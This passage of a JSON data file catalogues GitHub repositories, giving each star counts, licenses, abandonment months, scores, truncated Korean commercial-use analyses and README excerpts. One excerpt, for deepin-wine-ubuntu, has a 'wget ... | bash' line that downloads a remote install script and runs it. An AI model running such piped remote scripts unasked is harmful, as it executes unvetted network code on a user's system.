downloads](https://img.shields.io/npm/dm/redux-persist.svg?style=flat-square)](https://www.npmjs.com/package/redux-persist)\n\n## October 15th, 2021 - Move to TypeScript (Thanks [@smellman](https://github.com/smellman))\n\nAs part of the work to upgrade the infrastructure used to build redux-persist, we're moving from Flow to TypeScript.\n\n- Move from Flow to TypeScript\n- Move from TravisCI to GitHub Actions ([.github/workflows/ci.yml](.github/workflows/ci.yml))\n- Version updates for some dependencies\n\n## September 22nd, 2021 - Under New Management\n\nRedux Persist is a staple project for Redux developers, both on mobile and on the web. If you're here, it's likely beca","composite_score":0.3342,"license_safety_tag":"safe"},{"name":"nightmode/sprucemarks","github_url":"https://github.com/nightmode/sprucemarks","stars":5,"language":"JavaScript","license":"CC0-1.0","abandonment_months":11,"description":"# Sprucemarks 저장소 분석\n\n## 왜 보물인가\n북마크를 더 똑똑하게 정리하고 관리할 수 있는 도구로, 인터넷 사용자들이 매일 마주치는 '북마크 지옥' 문제를 해결합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 기반 북마크 관리 플랫폼으로 클라우드에 자동 동기화되는 구독 서비스\n2. **내부 업무 도구**: 팀 단위로 중요한 ","readme_excerpt":"# Sprucemarks\n\nA web browser extension that automatically sorts your bookmarks.\n\nAvailable in Chrome, Edge, and Firefox.\n\n## Navigation\n\n* [Install](#install)\n* [Development](#development)\n* [Test](#test)\n* [Deploy](#deploy)\n* [License](#license)\n\n## Install\n\nFor Chrome, install via the `Sprucemarks` page on the [Chrome Web Store](https://chrome.google.com/webstore/detail/sprucemarks/fakeocdnmmmnokabaiflppclocckihoj).\n\nFor Edge, install via the `Sprucemarks` page on the [Microsoft Edge Addons](https://microsoftedge.microsoft.com/addons/detail/hkgmpcaalcjjihcdkbnlnnhkppibepoa) site.\n\nFor Firefox, install via the `Sprucemarks` page on the [Firefox Add-ons](https://addons.mozilla.org/en-US/firefox/addon/sprucemarks/) site.\n\n## Development\n\nUse the `log` setting inside `source/js/shared.js` to enable or disable console logs for various events and operations.\n\nUse [Feri](https://github.com/nightmode/feri) to continually publish from the `source` directory to the `deploy` directory.\n\n### Dev","composite_score":0.3341,"license_safety_tag":"unknown"},{"name":"eczarny/spectacle","github_url":"https://github.com/eczarny/spectacle","stars":17,"language":"Objective-C","license":"NOASSERTION","abandonment_months":53,"description":"# Spectacle 저장소 분석\n\n## 왜 보물인가\n프레젠테이션 자료를 웹 기술로 만들 수 있어서, 누구나 쉽게 전문적인 슬라이드를 만들고 공유할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n온라인 프레젠테이션 빌더로 제공하여, 직장인들이 월 구독료를 내고 고급 슬라이드 템플릿과 클라우드 저장 기능을 이용하게 합니다.\n\n**2.","readme_excerpt":"# Spectacle\n\n[![Build Status](https://travis-ci.org/eczarny/spectacle.svg?branch=master)](https://travis-ci.org/eczarny/spectacle)\n\nEasily organize windows without using a mouse.\n\n## Important Note\n\n**This project is not being actively maintained.** Unfortunately, after almost a decade of on-and-off development I can no longer dedicate the time needed to be a responsible maintainer of this project. Spectacle will remain available for download but please use at your own risk. The source code will continue to be free and open to anyone, so feel free to make Spectacle your own.\n\nThanks to all the folks that have made Spectacle the first app they install a new Mac!\n\n_Spectacle users have recommended [Rectangle](https://github.com/rxhanson/Rectangle) as an open source alternative._\n\n## System requirements\n\nSpectacle [0.8.6][1] is the last version to support Mac OS X 10.7; future releases will only support 10.9 or greater. Folks wishing to stay on 10.7 should download [0.8.6][1]. Those looki","composite_score":0.3341,"license_safety_tag":"unknown"},{"name":"wemake-services/wemake-vue-template","github_url":"https://github.com/wemake-services/wemake-vue-template","stars":30,"language":"TypeScript","license":"MIT","abandonment_months":11,"description":"# wemake-services/wemake-vue-template 분석\n\n## 왜 보물인가\n웹사이트를 만들 때 필요한 기본 틀을 미리 만들어둔 것으로, 개발팀이 처음부터 다시 만드는 시간을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 구독형 웹 애플리케이션(예: 프로젝트 관리 도구, 회계 소프트웨어)의 기본 틀로 사용","readme_excerpt":"# wemake-vue-template\n\n[![wemake.services](https://img.shields.io/badge/-wemake.services-green.svg?label=%20&logo=data%3Aimage%2Fpng%3Bbase64%2CiVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAALGPC%2FxhBQAAAAFzUkdCAK7OHOkAAAAbUExURQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP%2F%2F%2F5TvxDIAAAAIdFJOUwAjRA8xXANAL%2Bv0SAAAADNJREFUGNNjYCAIOJjRBdBFWMkVQeGzcHAwksJnAPPZGOGAASzPzAEHEGVsLExQwE7YswCb7AFZSF3bbAAAAABJRU5ErkJggg%3D%3D)](https://wemake.services)\n[![Awesome](https://awesome.re/badge-flat2.svg)](https://awesomestacks.dev/nuxt-type-script-docker)\n[![Build Status](https://github.com/wemake-services/wemake-vue-template/workflows/Build/badge.svg?branch=master&event=push)](https://github.com/wemake-services/wemake-vue-template/actions?query=workflow%3ABuild)\n[![Docs](https://img.shields.io/badge/docs-success-brightgreen.svg)](https://wemake-services.gitbook.io/wemake-vue-template/)\n[![Dependencies Status](https://img.shields.io/badge/dependencies-up%20to%20date-brightgreen.svg)](https://githu","composite_score":0.3341,"license_safety_tag":"safe"},{"name":"me-no-dev/AsyncTCP","github_url":"https://github.com/me-no-dev/AsyncTCP","stars":797,"language":"C++","license":"LGPL-3.0","abandonment_months":16,"description":"# AsyncTCP 저장소 분석\n\n## 왜 보물인가\n인터넷 통신이 필요한 임베디드 기기(아두이노, ESP32 등)들이 동시에 여러 연결을 안정적으로 처리할 수 있게 만드는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **IoT 클라우드 플랫폼**: 수천 개의 스마트 센서가 동시에 데이터를 보낼 때 효율적으로 처리하는 백엔드 서비스\n2. **산업용 원격","readme_excerpt":"![https://avatars.githubusercontent.com/u/195753706?s=96&v=4](https://avatars.githubusercontent.com/u/195753706?s=96&v=4)\n\n# Project moved to [ESP32Async](https://github.com/organizations/ESP32Async) organization at [https://github.com/ESP32Async/AsyncTCP](https://github.com/ESP32Async/AsyncTCP)\n\nDiscord Server: [https://discord.gg/X7zpGdyUcY](https://discord.gg/X7zpGdyUcY)\n\nPlease see the new links:\n\n- `ESP32Async/ESPAsyncWebServer @ 3.6.0` (ESP32, ESP8266, RP2040)\n- `ESP32Async/AsyncTCP @ 3.3.2` (ESP32)\n- `ESP32Async/ESPAsyncTCP @ 2.0.0` (ESP8266)\n- `https://github.com/ESP32Async/AsyncTCPSock/archive/refs/tags/v1.0.3-dev.zip` (AsyncTCP alternative for ESP32)\n- `khoih-prog/AsyncTCP_RP2040W @ 1.2.0` (RP2040)\n","composite_score":0.334,"license_safety_tag":"restricted"},{"name":"kittykatattack/learningPixi","github_url":"https://github.com/kittykatattack/learningPixi","stars":7,"language":"","license":"unknown","abandonment_months":57,"description":"# learningPixi 저장소 분석\n\n## 왜 보물인가\n웹 브라우저에서 게임처럼 움직이는 그래픽을 쉽게 만들 수 있는 학습 자료로, 인터랙티브한 웹 콘텐츠 제작의 진입장벽을 낮춥니다.\n\n## 어디에 쓸 수 있나\n1. **인터랙티브 마케팅 플랫폼**: 광고 회사가 클릭하고 움직이는 웹 배너 광고를 빠르게 제작하는 SaaS 도구\n2. **교육용 게임 제작 ","readme_excerpt":"Learning Pixi\n=============\n\nA step-by-step introduction to making games and interactive media with\nthe [Pixi rendering engine](https://github.com/pixijs/pixi.js). **[Updated for Pixi v5.3.10](https://github.com/pixijs/pixi.js/releases/tag/v5.3.10)**. [Chinese version here: Pixi官方教程中文版](https://github.com/Zainking/learningPixi). If you like this\ntutorial, [you'll love the book, which contains 80% more content!](http://www.springer.com/us/book/9781484210956).\n\n### Table of contents\n1. [Introduction](#introduction)\n2. [Setting up](#settingup)\n    1. [Installing Pixi](#installingpixi)\n3. [Creating the stage and renderer](#application)\n4. [Pixi sprites](#sprites)\n5. [Loading images into the texture cache](#loading)\n6. [Displaying sprites](#displaying)\n    1. [Using Aliases](#usingaliases)\n    1. [A little more about loading things](#alittlemoreaboutloadingthings)\n        1. [Make a sprite from an ordinary JavaScript Image object or Canvas](#makeaspritefromanordinaryjavascriptimageobject)\n ","composite_score":0.3339,"license_safety_tag":"unknown"},{"name":"wszqkzqk/deepin-wine-ubuntu","github_url":"https://github.com/wszqkzqk/deepin-wine-ubuntu","stars":5,"language":"C","license":"unknown","abandonment_months":45,"description":"# deepin-wine-ubuntu 저장소 분석\n\n## 왜 보물인가\n리눅스 사용자들이 윈도우 전용 프로그램을 리눅스에서 실행할 수 있게 해주는 도구로, 운영체제 호환성 문제를 해결하는 실질적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **리눅스 사용자 지원 SaaS**: 리눅스를 주로 쓰는 개발자나 기업을 위해 윈도우 프로그램 호환성 제공 서비스\n2","readme_excerpt":"# Deepin wine for Ubuntu and Debian\n\n## 本项目仅为存档，不再维护\n\n## 一、项目介绍\n\n> Deepin-wine 环境的 Ubuntu/Debian 移植版 \n\n> 使用deepin原版二进制文件，解决依赖问题\n\n> 仅供个人研究学习使用\n\n> 刚刚适配debian，可能在安装或运行上还存在问题,欢迎反馈！\n\n> Gitee用户遇到问题请尽量到Github集中反馈或讨论，Gitee仓库主要仅作加速访问存档功能\n\n>声明：\n>因为使用本仓库的任何内容所导致的任何后果与本人无关，若你无法对使用该仓库后的任何后果负责，请不要使用本仓库的任何内容。\n>本仓库所有者不拥有该仓库任何二进制文件的版权，所有由本人编写的非二进制文件以GPL开源协议开源。若该仓库的文件侵犯了您的法律权益，请联系1726509538@qq.com，我会删除侵权内容并道歉。\n>该项目得以实现的全部功劳来自于深度操作系统开发人员的辛勤努力，本人只是将其成果适配到Ubuntu/Debian平台以让这一伟大成果能为更多人所共享，本人对深度操作系统的开发人员致以崇高的敬意。\n>2.18-19适配计划可能会推迟（因暂时无必要性，实际上新版软件改依赖即可安装，不太影响使用。）。\n\n## 二、软件架构\n\n软件架构说明\n\n### （1）安装教程\n\n#### 在线安装(目前尚有bug)\n\n直接使用在线安装脚本，安装最新的Release版本:\n\n```bash\nwget -qO- https://raw.githubusercontent.com/wszqkzqk/deepin-wine-ubuntu/master/online_install.sh | bash -e\n```\n\n#### 本地安装(Ubuntu/Debian通用)\n\n* 克隆 (`git clone https://github.com/wszqkzqk/deepin-wine-ubuntu.git`) 或[下载](https://github.com/wszqkzqk/deepin-wine-ubuntu/archive/master.zip)到本地。\n* 在中国推荐用下面的地址，速度更快： (`git clone https://gitee.com/wszqkzqk/deepin-wine-for-ubun","composite_score":0.3339,"license_safety_tag":"unknown"},{"name":"prusa3d/Original-Prusa-i3","github_url":"https://github.com/prusa3d/Original-Prusa-i3","stars":9,"language":"OpenSCAD","license":"gpl-2.0","abandonment_months":27,"description":"# Prusa3D Original-Prusa-i3 저장소 분석\n\n## 왜 보물인가\n누구나 집에서 3D 프린터를 만들 수 있도록 설계도와 지침을 완전히 공개한 오픈소스 프로젝트로, 전 세계 수만 명이 이를 기반으로 프린터를 제작하고 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 3D 프린팅 교육 플랫폼 SaaS**\n학교나 메이커스페이스를 위해 온라인 학습,","readme_excerpt":"# Original Prusa i3 MK3S\n\n\nOriginal Prusa i3 MK3S is a 3D printer project maintained by PRUSA RESEARCH.\nOriginates in [RepRap](https://reprap.org) project made possible by Dr. Adrian Bowyer and contributors.\n\nThis repository contains SCAD files and STLs of the printed parts.\n\n**Links**\n\n * Prusa Research website : http://prusa3d.com\n * Product page: https://shop.prusa3d.com/en/3d-printers/180-original-prusa-i3-mk3-kit.html\n * Build manual: http://manual.prusa3d.com/c/Original_Prusa_i3_MK3_kit_assembly\n * Firmware : https://github.com/prusa3d/Prusa-Firmware\n * MK52 heatbed : https://github.com/prusa3d/Heatbed_MK52_magnetic\n * MK3 Power panic : https://github.com/prusa3d/MK3_Power_Panic\n * MK3S IR senzor : https://github.com/prusa3d/MKxS-IR-sensor\n \n","composite_score":0.3339,"license_safety_tag":"restricted"},{"name":"FlorianWilk/SpotMicroAI","github_url":"https://github.com/FlorianWilk/SpotMicroAI","stars":8,"language":"","license":"unknown","abandonment_months":75,"description":"","readme_excerpt":"![Logo](https://gitlab.com/custom_robots/spotmicroai/website/raw/master/docs/assets/logo.png)\n\n## Abstract:\nThe SpotMicroAI project is designed to be a low cost, easily built quadruped robot. The design is roughly based off of Boston Dynamics quadruped robot SpotMini, though with obvious adaptations such as size and sensor suite.\n\nThe project is maintained by a community of volunteers and is very much still in its early stages. Any individual is welcome to contribute, and in particular expertise in areas involving simulation, reinforcement learning, and hardware development is greatly appreciated.\n\n## But where is the code?\n\nWe have moved to gitlab.com this repository due current limitations in github.com that prevents the community to work with the repository after certain quota is reached.\n\nThe new repositories URL is located at: **https://gitlab.com/custom_robots/spotmicroai**\n\nIf you like to know more why we migrated to gitlab, the data that triggered the decision is here: https://","composite_score":0.3338,"license_safety_tag":"unknown"},{"name":"alibaba/sealer","github_url":"https://github.com/alibaba/sealer","stars":10,"language":"Go","license":"Apache-2.0","abandonment_months":12,"description":"# Alibaba Sealer 프로젝트 분석\n\n## 왜 보물인가\n복잡한 서버 환경을 간단하게 구축하고 관리할 수 있는 오픈소스 도구로, 기업의 IT 인프라 구축 비용을 크게 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객사별 맞춤형 서버 환경을 자동으로 구성하고 배포하는 클라우드 플랫폼\n2. **내부 업무 도구**: 기업","readme_excerpt":"# Sealer -- Build, Share and Run Any Distributed Applications\n\n[![License](https://img.shields.io/badge/license-Apache%202-brightgreen.svg)](https://github.com/sealerio/sealer/blob/master/LICENSE)\n[![Go](https://github.com/sealerio/sealer/actions/workflows/go.yml/badge.svg)](https://github.com/sealerio/sealer/actions/workflows/go.yml)\n[![Release](https://github.com/sealerio/sealer/actions/workflows/release.yml/badge.svg)](https://github.com/sealerio/sealer/actions/workflows/release.yml)\n[![GoDoc](https://godoc.org/github.com/sealerio/sealer?status.svg)](https://godoc.org/github.com/sealerio/sealer)\n[![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/5205/badge)](https://bestpractices.coreinfrastructure.org/en/projects/5205)\n[![Twitter](https://img.shields.io/badge/Follow-sealer-1DA1F2?logo=twitter)](https://twitter.com/sealer_oss)\n[![FOSSA Status](https://app.fossa.com/api/projects/git%2Bgithub.com%2Fsealerio%2Fsealer.svg?type=shield)](https://app.fossa.com/pro","composite_score":0.3336,"license_safety_tag":"safe"},{"name":"sockeqwe/mosby","github_url":"https://github.com/sockeqwe/mosby","stars":6,"language":"Java","license":"apache-2.0","abandonment_months":51,"description":"# Mosby 저장소 분석\n\n## 왜 보물인가\n앱 개발할 때 화면 전환과 데이터 관리를 쉽게 해주는 틀을 제공하기 때문에, 개발자들의 작업 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업용 모바일 앱 개발 플랫폼으로, 개발사들이 더 빨리 앱을 만들 수 있도록 제공\n- **내부 업무 도구**: 대규모 개발팀이 자","readme_excerpt":"# Mosby\nA Model-View-Presenter and Model-View-Intent library for Android apps.\n\n\n[![Build Status](https://travis-ci.org/sockeqwe/mosby.svg?branch=master)](https://travis-ci.org/sockeqwe/mosby)\n\n# Dependency\n\n```groovy\ndependencies {\n\n  compile 'com.hannesdorfmann.mosby3:mvi:3.1.1' // Model-View-Intent\n  // or\n  compile 'com.hannesdorfmann.mosby3:mvp:3.1.1' // Plain MVP\n  // or\n  compile 'com.hannesdorfmann.mosby3:viewstate:3.1.1' // MVP + ViewState support\n}\n```\n\nAdditional modules:\n\n```groovy\ndependencies {\n\n  // MVP + ViewState + LCE Views\n  compile 'com.hannesdorfmann.mosby3:mvp-lce:3.1.1'\n\n  // Null Object Presenter for MVP\n  compile 'com.hannesdorfmann.mosby3:mvp-nullobject-presenter:3.1.1'\n  \n  // Queuing Presenter for MVP\n  compile 'com.hannesdorfmann.mosby3:mvp-queuing-presenter:3.1.1'\n}\n```\n\n**SNAPSHOT:**\n\n```groovy\ndependencies {\n\n  compile 'com.hannesdorfmann.mosby3:mvi:3.1.2-SNAPSHOT'\n\n  compile 'com.hannesdorfmann.mosby3:mvp:3.1.2-SNAPSHOT'\n  compile 'com.hannesdorfmann.mo","composite_score":0.3336,"license_safety_tag":"safe"},{"name":"Ramotion/folding-cell-android","github_url":"https://github.com/Ramotion/folding-cell-android","stars":6,"language":"Java","license":"mit","abandonment_months":45,"description":"# Folding Cell Android 분석\n\n## 왜 보물인가\n앱에서 카드가 펼쳐지는 듯한 부드러운 애니메이션 효과를 쉽게 구현할 수 있는 오픈소스 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스 (전자상거래 앱)**\n쇼핑몰 앱에서 상품 카드를 접었다 펼치는 인터페이스로 사용자 경험을 향상시킬 수 있습니다.\n\n**2. 내부 업무 도구 ","readme_excerpt":"<a href=\"https://www.ramotion.com/agency/app-development/?utm_source=gthb&utm_medium=repo&utm_campaign=folding-cell-android\"><img src=\"https://github.com/Ramotion/folding-cell/blob/master/header.png\"></a>\n\n<a href=\"https://github.com/Ramotion/folding-cell-android\">\n<img align=\"left\" src=\"https://github.com/Ramotion/folding-cell-android/blob/master/folding_cell_preview.gif\" width=\"480\" height=\"360\" /></a>\n\n<p><h1 align=\"left\">FOLDING CELL [JAVA]</h1></p>\n\n<h4>Expanding content cell with animation inspired by folding paper card material design.</h4>\n\n\n___\n\n\n\n<p><h6>We specialize in the designing and coding of custom UI for Mobile Apps and Websites.</h6>\n<a href=\"https://www.ramotion.com/agency/app-development/?utm_source=gthb&utm_medium=repo&utm_campaign=folding-cell-android\">\n<img src=\"https://github.com/ramotion/gliding-collection/raw/master/contact_our_team@2x.png\" width=\"187\" height=\"34\"></a>\n</p>\n<p><h6>Stay tuned for the latest updates:</h6>\n<a href=\"https://goo.gl/rPFpid\" >\n<img s","composite_score":0.3335,"license_safety_tag":"safe"},{"name":"zenorocha/alfred-workflows","github_url":"https://github.com/zenorocha/alfred-workflows","stars":9,"language":"","license":"unknown","abandonment_months":64,"description":"# zenorocha/alfred-workflows 평가 보고서\n\n## 왜 보물인가\nMac 사용자들이 반복적인 작업을 자동으로 처리할 수 있게 해주는 실용적인 도구 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: Alfred 플러그인 마켓플레이스에서 유료 워크플로우 판매 (월 $4.99~$9.99)\n2. **내부 업무 도구**: 디자인","readme_excerpt":"# Alfred Workflows\n\nA collection of [Alfred 3 and 4](https://www.alfredapp.com/) workflows that will rock your world.\n\n![Alfred Logo](https://cloud.githubusercontent.com/assets/398893/3528722/5b5b30c6-0792-11e4-956d-750ac3a00bd8.png)\n\n## Install\n\nDownload and open file using [Alfred](https://www.alfredapp.com/).\n\nP.S.: You need to [buy the Powerpack](https://buy.alfredapp.com/) to use these workflows.\n\n## Workflows\n\n:arrow_down: **&nbsp;[Download them all](https://github.com/zenorocha/alfred-workflows/releases).**\n\n### [Caffeinate](https://github.com/shawnrice/alfred-2-caffeinate-workflow) (v3.03.0) ~ [Download](https://github.com/zenorocha/alfred-workflows/raw/master/caffeinate/caffeinate.alfredworkflow)\n\nSolves the problem of your computer constantly falling asleep by using OS X's native command line ~ *by [@shawnrice](https://github.com/shawnrice/).*\n\n> Triggers: `caff`.\n\n<img width=\"594\" alt=\"caffeinate\" src=\"https://cloud.githubusercontent.com/assets/398893/14361901/01febfd6-fcb2-","composite_score":0.3335,"license_safety_tag":"unknown"},{"name":"jawil/blog","github_url":"https://github.com/jawil/blog","stars":8,"language":"JavaScript","license":"unknown","abandonment_months":86,"description":"# jawil/blog 저장소 분석\n\n## 왜 보물인가\n개인 블로그 운영을 자동화하고 체계적으로 관리할 수 있는 기본 프레임워크를 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 블로그 호스팅 플랫폼으로 개발하여 일반인도 쉽게 블로그를 만들고 운영할 수 있는 서비스\n2. **내부 업무 도구**: 회사 뉴스레터나 공지사항 관리 시스템으로","readme_excerpt":"## [前端小密圈](http://qdxmq.com/)\n\n> **博客签名：若批评无自由，则赞美无意义。**\n\n> **博客目的：风起于青萍之末，浪成于微澜之间。**\n\n> **博客宗旨：从现象看本质，再从本质回归到现象。**\n\n> **博客主人：Too young,too simple.Sometimes,naive.**\n               \n> **博客座右铭：生活不止裆下的苟且，还有未知的bug和看不懂的code。**\n\n**行远自迩，登高自卑，与君共勉。文以载道，歌以咏志。** \n\n### **[奇文共欣赏，疑义相与析。](https://github.com/jawil/blog/issues/6)(持续更新)**\n## 2018\n### March\n*三月金明柳絮飞，岸花堤草弄春时。*\n\n* March 5, 2018 **»** [一行代码实现一个简单的模板字符串替换](https://github.com/jawil/blog/issues/32)\n\n\n## 2017\n### December\n*日晏霜浓十二月，林疏石瘦第三溪。*\n* December 23, 2017 **»** [JavaScript 优雅的实现方式包含你可能不知道的知识点](https://github.com/jawil/blog/issues/30)\n\n### September\n*可怜九月初三夜，露似珍珠月似弓。*\n\n* September 26, 2017 **»** [CSS 黑魔法小技巧，让你少写不必要的JS，代码更优雅](https://github.com/jawil/blog/issues/29)\n* September 14, 2017 **»** [安利一下自己为 GitHub 开发的首个 Chrome 插件—GayHub😂](https://github.com/jawil/blog/issues/28)\n\n\n### August\n*八月凉风天气晶，万里无云河汉明。*\n* August 20, 2017 **»** [这些JavaScript编程黑科技，装逼指南，高逼格代码，让你惊叹不已](https://github.com/jawil/blog/issues/24)\n* August 9, 2017 **»** [面试分享：一年经验初","composite_score":0.3334,"license_safety_tag":"unknown"},{"name":"VictoriaMetrics/fastcache","github_url":"https://github.com/VictoriaMetrics/fastcache","stars":27,"language":"Go","license":"MIT","abandonment_months":1,"description":"# VictoriaMetrics/fastcache 분석\n\n## 왜 보물인가\n매우 빠른 속도로 데이터를 임시 저장했다가 꺼내는 기술로, 인터넷 서비스의 응답 속도를 획기적으로 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 실시간 분석 대시보드 제공 플랫폼에서 데이터 조회 속도를 10배 이상 가속화\n- **내부 업무 도구**: 대","readme_excerpt":"[![Build Status](https://github.com/VictoriaMetrics/fastcache/workflows/main/badge.svg)](https://github.com/VictoriaMetrics/fastcache/actions)\n[![GoDoc](https://godoc.org/github.com/VictoriaMetrics/fastcache?status.svg)](http://godoc.org/github.com/VictoriaMetrics/fastcache)\n[![Go Report](https://goreportcard.com/badge/github.com/VictoriaMetrics/fastcache)](https://goreportcard.com/report/github.com/VictoriaMetrics/fastcache)\n[![codecov](https://codecov.io/gh/VictoriaMetrics/fastcache/branch/master/graph/badge.svg)](https://codecov.io/gh/VictoriaMetrics/fastcache)\n\n# fastcache - fast thread-safe inmemory cache for big number of entries in Go\n\n### Features\n\n* Fast. Performance scales on multi-core CPUs. See benchmark results below.\n* Thread-safe. Concurrent goroutines may read and write into a single\n  cache instance.\n* The fastcache is designed for storing big number of entries without\n  [GC overhead](https://syslog.ravelin.com/further-dangers-of-large-heaps-in-go-7a267b57d487).\n* Fast","composite_score":0.3333,"license_safety_tag":"safe"},{"name":"krasun/gosqlparser","github_url":"https://github.com/krasun/gosqlparser","stars":5,"language":"Go","license":"MIT","abandonment_months":17,"description":"# gosqlparser 상용화 분석\n\n## 왜 보물인가\n복잡한 데이터베이스 명령어를 자동으로 읽고 해석해주는 도구로, 데이터를 다루는 모든 비즈니스에서 업무 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **데이터 분석 SaaS**: 고객이 업로드한 데이터베이스 쿼리를 자동 분석해 통계 리포트를 생성하는 웹 서비스\n2. **기업용 내부","readme_excerpt":"# gosqlparser\n\n[![Build](https://github.com/krasun/gosqlparser/actions/workflows/build.yml/badge.svg?branch=main)](https://github.com/krasun/gosqlparser/actions/workflows/build.yml)\n[![Go Report Card](https://goreportcard.com/badge/github.com/krasun/gosqlparser)](https://goreportcard.com/report/github.com/krasun/gosqlparser)\n[![GoDoc](https://godoc.org/https://godoc.org/github.com/krasun/gosqlparser?status.svg)](https://godoc.org/github.com/krasun/gosqlparser)\n\n`gosqlparser` is a simple SQL parser.\n\nUse cases: \n- as part of the database engine; \n- as part of an application API instead of RPC or REST; \n- to query data from CSV and other table-like files.\n\n## Installation\n\nAs simple as:\n\n```\ngo get github.com/krasun/gosqlparser\n```\n\n## Usage \n\n```go\npackage gosqlparser_test\n\nimport (\n\t\"fmt\"\n\n\t\"encoding/json\"\n\n\tsql \"github.com/krasun/gosqlparser\"\n)\n\nfunc Example() {\n\tquery, err := sql.Parse(\"SELECT col1, col2 FROM table1 WHERE col1 == \\\"abc\\\" AND col3 == 5 LIMIT 10\")\n\tif err != nil {\n\t\tfm","composite_score":0.3333,"license_safety_tag":"safe"},{"name":"Qihoo360/wayne","github_url":"https://github.com/Qihoo360/wayne","stars":7,"language":"TypeScript","license":"NOASSERTION","abandonment_months":49,"description":"# Wayne 저장소 분석 보고서\n\n## 왜 보물인가\n클라우드 환경에서 애플리케이션을 쉽게 배포하고 관리할 수 있게 도와주는 플랫폼으로, 기업의 운영 효율성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업들이 자체 클라우드 환경을 구축할 때 필요한 배포 관리 도구로 판매\n2. **내부 업무 도구**: 대형 IT 회사","readme_excerpt":"# Wayne\n\n[![Build Statue](https://travis-ci.org/Qihoo360/wayne.svg?branch=master)](https://travis-ci.org/Qihoo360/wayne)\n[![Build Tag](https://img.shields.io/github/tag/Qihoo360/wayne.svg)](https://github.com/Qihoo360/wayne/releases)\n[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://github.com/Qihoo360/wayne/blob/master/LICENSE)\n[![Go Report Card](https://goreportcard.com/badge/github.com/Qihoo360/wayne)](https://goreportcard.com/report/github.com/Qihoo360/wayne)\n\n[English](https://github.com/Qihoo360/wayne/blob/master/README.md) | [中文](https://github.com/Qihoo360/wayne/blob/master/README-CN.md)\n\nWayne is a universal, web-based **[Kubernetes](https://kubernetes.io) multi-cluster management platform**. It reduces service access costs by visualizing Kubernetes object template editing.\nWith a complete permission management system and adapting to multi-tenant scenarios, it is a **publish platform** suitable for enterprise-level clusters.\n\nWayne has been servi","composite_score":0.3333,"license_safety_tag":"unknown"},{"name":"LRH1993/android_interview","github_url":"https://github.com/LRH1993/android_interview","stars":7,"language":"HTML","license":"unknown","abandonment_months":64,"description":"# LRH1993/android_interview 평가\n\n## 왜 보물인가\n안드로이드 앱 개발 관련 면접 준비 자료를 체계적으로 정리한 학습 가이드로, 개발자 채용 시장에서 수요가 지속적인 교육 콘텐츠입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 개발자 교육 플랫폼**: 구독형 사이트에서 면접 준비 강의나 모의 시험 콘텐츠로 제공\n2. **개발자 채용","readme_excerpt":"# Android校招面试指南\n\n## ![](/assets/page_icon.jpg)\n\n## Java\n\n* [Java基础](/java/basis.md)\n* [Java并发](/java/concurrence.md)\n* [Java虚拟机](/java/virtual-machine.md)\n\n## Android\n\n* [Android基础](/android/basis.md)\n* [Android进阶](/android/advance.md)\n* [开源框架](/android/open-source-framework.md)\n\n## 数据结构\n\n* [线性表](/data-structure/linear-list.md)\n* [栈和队](/data-structure/stack-queue.md)\n* [树](/data-structure/tree.md)\n* [图](/data-structure/graph.md)\n* [散列查找](/data-structure/hash.md)\n* [排序](/data-structure/sort.md)\n* [海量数据处理](/data-structure/mass_data_processing.md)\n\n## 算法\n\n* [剑指offer](/algorithm/For-offer.md)\n* [LeetCode](/algorithm/leetcode.md)\n\n## 设计模式\n\n* [创建型模式](/design-mode/Builder-Pattern.md)\n* [结构型模式](/design-mode/Structural-Patterns.md)\n* [行为型模式](/design-mode/Behavioral-Pattern.md)\n\n## 计算机网络\n\n* [TCP/IP](/computer-networks/tcpip.md)\n* [HTTP](/computer-networks/http.md)\n* [HTTPS](/computer-networks/https.md)\n\n## 操作系统\n\n- [概述](/operating-system/summarize.md)\n- [进程与线程](/operating-system/process-thread.md","composite_score":0.3329,"license_safety_tag":"unknown"},{"name":"codeestX/GeekNews","github_url":"https://github.com/codeestX/GeekNews","stars":5,"language":"Java","license":"unknown","abandonment_months":94,"description":"# GeekNews 저장소 평가\n\n## 왜 보물인가\n기술 뉴스를 자동으로 수집하고 정리해주는 도구로, 개발자들이 최신 정보를 효율적으로 따라잡을 수 있게 도와줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기술 뉴스 큐레이션 구독 플랫폼 (Medium의 기술 섹션처럼 일일 뉴스 추천)\n2. **내부 업무 도구**: 대형 IT회사의 R&D팀","readme_excerpt":"# GeekNews\n\n[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)\n\nGeekNews, A pure reading App based on Material Design + MVP + RxJava2 + Retrofit + Dagger2 + Realm + Glide\n\n极客日报，一款纯粹的阅读App，基于Material Design + MVP + RxJava2 + Retrofit + Dagger2 + Realm + Glide\n\n出于学习的目的做了这款Material Design风格的简洁的阅读应用，基本涵盖了当前Android端开发最常用的主流框架，阅读内容主要面向程序员/极客，目前包括:  \n\n[知乎日报](http://daily.zhihu.com/)&nbsp;&nbsp;—&nbsp;&nbsp;汇集知乎上的热门话题与新鲜事，板块众多  \n[微信精选](http://www.tianapi.com/#wxnew)&nbsp;&nbsp;—&nbsp;&nbsp;汇集微信上的海量精选新闻资讯，支持搜索  